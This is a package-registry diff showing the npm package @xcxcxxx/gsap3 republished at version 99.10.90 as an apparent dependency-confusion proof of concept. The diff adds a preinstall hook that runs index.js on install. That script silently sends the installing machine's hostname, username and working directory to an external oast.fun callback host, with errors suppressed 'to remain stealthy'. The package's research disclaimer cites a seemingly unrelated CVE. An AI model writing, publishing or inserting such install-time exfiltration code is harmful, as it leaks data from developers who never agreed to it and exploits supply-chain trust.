@xcxcxxx/gsap3 1.0.0 → 99.10.90
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +53 -1
- package/package.json +17 -2
package/index.js
CHANGED
|
@@ -1 +1,53 @@
|
|
|
1
|
-
//
|
|
1
|
+
// index.js - A safe and minimal payload for dependency confusion PoC
|
|
2
|
+
const os = require('os');
|
|
3
|
+
const https = require('https');
|
|
4
|
+
const process = require('process');
|
|
5
|
+
|
|
6
|
+
// =================================================================================
|
|
7
|
+
// CONFIGURE THIS: Replace with your unique Interactsh/Burp Collaborator/Webhook URL
|
|
8
|
+
// =================================================================================
|
|
9
|
+
const CALLBACK_URL = 'https://ocvomeqbrouywnpfvqwhgho1ni6xrjica.oast.fun';
|
|
10
|
+
// =================================================================================
|
|
11
|
+
|
|
12
|
+
try {
|
|
13
|
+
// 1. Collect minimal, non-sensitive identifying information.
|
|
14
|
+
const data = {
|
|
15
|
+
hostname: os.hostname(),
|
|
16
|
+
username: os.userInfo().username,
|
|
17
|
+
cwd: process.cwd(),
|
|
18
|
+
package_name: 'gsap3', // So you know which PoC was triggered
|
|
19
|
+
};
|
|
20
|
+
|
|
21
|
+
// 2. Prepare the data and options for the HTTPS POST request.
|
|
22
|
+
const postData = JSON.stringify(data);
|
|
23
|
+
|
|
24
|
+
const options = {
|
|
25
|
+
method: 'POST',
|
|
26
|
+
headers: {
|
|
27
|
+
'Content-Type': 'application/json',
|
|
28
|
+
'Content-Length': Buffer.byteLength(postData),
|
|
29
|
+
'User-Agent': 'npm-poc-script/1.0' // A clear user agent
|
|
30
|
+
}
|
|
31
|
+
};
|
|
32
|
+
|
|
33
|
+
// 3. Send the request.
|
|
34
|
+
// The hostname of the CALLBACK_URL is extracted to use as the `host` option.
|
|
35
|
+
const url = new URL(CALLBACK_URL);
|
|
36
|
+
const req = https.request({ ...options, host: url.hostname, path: url.pathname }, (res) => {
|
|
37
|
+
// We don't need to do anything with the response, just fire and forget.
|
|
38
|
+
res.on('data', () => {}); // Consume response data to free up memory
|
|
39
|
+
});
|
|
40
|
+
|
|
41
|
+
req.on('error', (e) => {
|
|
42
|
+
// Error handling in case the callback fails (e.g., network issues, firewall)
|
|
43
|
+
// We do not log the error to the console to remain stealthy.
|
|
44
|
+
});
|
|
45
|
+
|
|
46
|
+
// Write data to request body and end the request.
|
|
47
|
+
req.write(postData);
|
|
48
|
+
req.end();
|
|
49
|
+
|
|
50
|
+
} catch (e) {
|
|
51
|
+
// If any part of the data collection or request setup fails, do nothing.
|
|
52
|
+
// This ensures the install process doesn't break if our script has an issue.
|
|
53
|
+
}
|
package/package.json
CHANGED
|
@@ -1,5 +1,20 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@xcxcxxx/gsap3",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
3
|
+
"version": "99.10.90",
|
|
4
|
+
"description": "SECURITY RESEARCH - Dependency confusion PoC. If you have installed this package, please contact your security team and refer to CVE-2021-23337. This package is meant to demonstrate a vulnerability and is not malicious.",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "node index.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "Security Researcher",
|
|
10
|
+
"license": "ISC",
|
|
11
|
+
"repository": {
|
|
12
|
+
"type": "git",
|
|
13
|
+
"url": "https://github.com/your-username/security-poc-repo"
|
|
14
|
+
},
|
|
15
|
+
"keywords": [
|
|
16
|
+
"security",
|
|
17
|
+
"research",
|
|
18
|
+
"dependency-confusion"
|
|
19
|
+
]
|
|
5
20
|
}
|